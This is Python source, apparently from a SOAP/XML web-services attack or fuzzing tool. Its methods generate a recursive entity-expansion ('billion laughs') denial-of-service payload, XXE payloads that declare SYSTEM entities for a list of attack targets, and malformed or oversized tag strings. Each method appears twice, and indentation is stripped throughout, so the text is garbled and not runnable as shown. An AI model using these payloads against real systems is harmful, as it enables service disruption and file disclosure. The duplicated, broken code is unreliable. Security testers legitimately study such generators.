def generateXMLGarbage(self):
str = gt = gtc = ''
rnd = attackUtils.genRandom(100, b64=True)
rnd_tag = attackUtils.genRandom(30, b64=True)
final = []
for i in range(101):
str = str + " a=\"%d\"" % i
final.append('<%s' % rnd_tag)
final.append(str)
final.append('>')
for i in range(21):
gt = gt + '<%s>' % rnd_tag
gtc = gtc + '</%s>' % rnd_tag
final.append(gt)
# add an incomplete set of tags here
self.addstring(''.join(final), 'tags')
final.append(rnd)
final.append('\n')
final.append(gtc)
final.append('</%s>' % rnd_tag)
# add the complete XML set of tagged data here
self.addstring(''.join(final), 'tags')
def generateXMLGarbage(self):
str = gt = gtc = ''
rnd = attackUtils.genRandom(100, b64=True)
rnd_tag = attackUtils.genRandom(30, b64=True)
final = []
for i in range(101):
str = str + " a=\"%d\"" % i
final.append('<%s' % rnd_tag)
final.append(str)
final.append('>')
for i in range(21):
gt = gt + '<%s>' % rnd_tag
gtc = gtc + '</%s>' % rnd_tag
final.append(gt)
# add an incomplete set of tags here
self.addstring(''.join(final), 'tags')
final.append(rnd)
final.append('\n')
final.append(gtc)
final.append('</%s>' % rnd_tag)
# add the complete XML set of tagged data here
self.addstring(''.join(final), 'tags')
def __init__(self):
self.wssecurity = []
self.xml = {}
self.getTags()
self.rnd = attackUtils.genRandom(300, b64=True)
self.rndUser = attackUtils.genRandom(300, b64=True)
self.rndPass = attackUtils.genRandom(300, b64=True)
self.rnd3 = attackUtils.genRandom(3000, b64=True)
self.rnd6 = attackUtils.genRandom(6000, b64=True)
def __init__(self):
self.wssecurity = []
self.xml = {}
self.getTags()
self.rnd = attackUtils.genRandom(300, b64=True)
self.rndUser = attackUtils.genRandom(300, b64=True)
self.rndPass = attackUtils.genRandom(300, b64=True)
self.rnd3 = attackUtils.genRandom(3000, b64=True)
self.rnd6 = attackUtils.genRandom(6000, b64=True)
def generateGenericXXE(self, val=101):
rnd = attackUtils.genRandom(100, b64=True)
rnd_tag = attackUtils.genRandom(30, b64=True)
soapStr = StringIO()
soapStr.write(self.xml["xh"])
soapStr.write('<!DOCTYPE %s [<!ENTITY x0 \"' % rnd_tag)
soapStr.write(rnd)
soapStr.write('\">')
for i in range(1, val):
x = i - 1
soapStr.write('<!ENTITY x%s \"&x%s;&x%s;\">' % (i, x, x))
soapStr.write(']>')
soapStr.write('<%s>&x%d;</%s>' % (rnd_tag, val - 1, rnd_tag))
self.addstring(soapStr, 'entity')
def generateGenericXXE(self, val=101):
rnd = attackUtils.genRandom(100, b64=True)
rnd_tag = attackUtils.genRandom(30, b64=True)
soapStr = StringIO()
soapStr.write(self.xml["xh"])
soapStr.write('<!DOCTYPE %s [<!ENTITY x0 \"' % rnd_tag)
soapStr.write(rnd)
soapStr.write('\">')
for i in range(1, val):
x = i-1
soapStr.write('<!ENTITY x%s \"&x%s;&x%s;\">' % (i, x, x))
soapStr.write(']>')
soapStr.write('<%s>&x%d;</%s>' % (rnd_tag, val-1, rnd_tag))
self.addstring(soapStr, 'entity')
def generateOSXXE(self):
for attack in self.attacks:
rnd_tag = attackUtils.genRandom(30, b64=True)
soapStr = StringIO()
soapStr.write(self.xml["xh"])
soapStr.write('<!DOCTYPE %s [' % rnd_tag)
soapStr.write('<!ELEMENT %s ANY>' % rnd_tag)
soapStr.write('<!ENTITY xxe SYSTEM \"%s\">' % attack)
soapStr.write(']>')
soapStr.write('<%s>&xxe;</%s>' % (rnd_tag, rnd_tag))
self.addstring(soapStr, 'entity')
def generateOSXXE(self):
for attack in self.attacks:
rnd_tag = attackUtils.genRandom(30, b64=True)
soapStr = StringIO()
soapStr.write(self.xml["xh"])
soapStr.write('<!DOCTYPE %s [' % rnd_tag)
soapStr.write('<!ELEMENT %s ANY>' % rnd_tag)
soapStr.write('<!ENTITY xxe SYSTEM \"%s\">' % attack)
soapStr.write(']>')
soapStr.write('<%s>&xxe;</%s>' % (rnd_tag, rnd_tag))
self.addstring(soapStr, 'entity')
def generateTagAttacks(self, param):
rnd = attackUtils.genRandom(200, b64=True)
final = []
final.append('<')
final.append(param)
final.append('>')
# generate a bunch of legit looking open tags
self.generateXMLFuzzData(''.join(final), 256, 64, 'tags')
final.append('%s</' % rnd)
final.append(param)
final.append('>')
# generate a complete set of legit looking XML tags
self.generateXMLFuzzData(''.join(final), 256, 64, 'tags')
# generate a bunch of legit looking close tags
self.generateXMLFuzzData('</' + param + '>', 256, 64, 'tags')
def generateTagAttacks(self, param):
rnd = attackUtils.genRandom(200, b64=True)
final = []
final.append('<')
final.append(param)
final.append('>')
# generate a bunch of legit looking open tags
self.generateXMLFuzzData(''.join(final), 256, 64, 'tags')
final.append('%s</' % rnd)
final.append(param)
final.append('>')
# generate a complete set of legit looking XML tags
self.generateXMLFuzzData(''.join(final), 256, 64, 'tags')
# generate a bunch of legit looking close tags
self.generateXMLFuzzData('</' + param + '>', 256, 64, 'tags')
